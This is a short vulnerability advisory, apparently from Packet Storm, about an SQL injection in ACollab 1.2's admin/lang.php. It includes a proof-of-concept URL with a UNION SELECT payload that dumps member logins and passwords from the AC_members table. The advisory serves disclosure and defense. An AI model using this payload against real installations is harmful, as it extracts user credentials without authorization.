ACollab version 1.2 suffers from a remote SQL injection vulnerability.
3d687f9f86607e448a2e75242a3821f4fe95c0bd1d065ae0259617f7fef6fedc------------------------------------------------------------------------
Software................ACollab 1.2
Vulnerability...........SQL Injection
Download................http://atutor.ca/acollab/
Release Date............1/31/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
An SQL injection vulnerability in ACollab 1.2 can be exploited to
retrieve a list of usernames and passwords. Because the malicious
string is stored in the session it may be necessary to refresh the page.
--PoC--
http://localhost/acollab/admin/lang.php?lang=&t=xxx'UNION%20SELECT%200,0,'error',GROUP_CONCAT(login,':',password),4%20FROM%20AC_members%20WHERE%20'a'='a
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed